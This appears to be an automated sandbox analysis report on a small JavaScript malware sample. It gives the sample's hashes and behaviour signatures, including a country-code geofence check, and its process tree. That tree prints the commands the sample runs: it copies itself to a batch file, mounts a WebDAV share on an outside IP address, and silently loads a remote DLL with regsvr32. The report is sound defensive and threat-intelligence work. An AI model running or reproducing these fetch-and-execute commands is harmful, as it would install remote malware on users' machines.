Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 07:09
Static task
static1
Behavioral task
behavioral1
Sample
1923026809113518098.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
1923026809113518098.js
Resource
win10v2004-20240704-en
General
-
Target
1923026809113518098.js
-
Size
5KB
-
MD5
b99d494fa04f6720386a27d7d15f626c
-
SHA1
9c81c334af5a5df8642a9e985663d070c9248be7
-
SHA256
7ec6e6d04be19d3fafe2ec14ddb33101b325b4caeada78b49d78c26eeb951174
-
SHA512
7d1f4a587ae400e6ee7a4f4a681ccc8e0cbc710f8fc4d7d82166b1ad2a2d612485184142bf8b516f5f57be9de6b6246343a0fe340858a56ca56f5d0fb7a7392b
-
SSDEEP
96:kPyMzaZsva4go9AWZPCoa7GRuQwRuEBRakGRx:iuZblaCTCwueRakGRx
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3064 wrote to memory of 464 3064 wscript.exe 82 PID 3064 wrote to memory of 464 3064 wscript.exe 82 PID 464 wrote to memory of 5076 464 cmd.exe 85 PID 464 wrote to memory of 5076 464 cmd.exe 85 PID 464 wrote to memory of 2188 464 cmd.exe 86 PID 464 wrote to memory of 2188 464 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1923026809113518098.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1923026809113518098.js" "C:\Users\Admin\\ljjkmz.bat" && "C:\Users\Admin\\ljjkmz.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:5076
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\508.dll3⤵PID:2188
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5b99d494fa04f6720386a27d7d15f626c
SHA19c81c334af5a5df8642a9e985663d070c9248be7
SHA2567ec6e6d04be19d3fafe2ec14ddb33101b325b4caeada78b49d78c26eeb951174
SHA5127d1f4a587ae400e6ee7a4f4a681ccc8e0cbc710f8fc4d7d82166b1ad2a2d612485184142bf8b516f5f57be9de6b6246343a0fe340858a56ca56f5d0fb7a7392b